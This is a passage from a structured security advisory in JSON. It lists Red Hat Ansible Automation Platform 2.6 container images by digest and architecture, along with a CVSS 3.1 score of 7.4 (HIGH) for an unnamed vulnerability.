"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
